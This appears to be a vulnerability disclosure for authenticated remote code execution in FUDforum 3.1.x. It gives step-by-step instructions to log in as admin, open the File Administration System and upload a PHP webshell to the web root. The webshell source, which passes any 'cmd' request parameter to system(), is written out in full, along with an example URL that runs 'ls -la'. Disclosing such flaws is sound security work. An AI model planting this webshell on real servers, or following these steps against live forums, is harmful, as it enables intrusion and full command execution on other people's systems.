Description
Remote code execution with File Administration System feature in Admin Control Panel Site
Affected Version- 3.1.0
Demo installation: https://localhost/FUDforum-3.1.2/
Steps to reproduce the bug:
1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account
2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119

3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory
WebShell payload:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

4 : Access to webshell and get remote execution code.
Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la

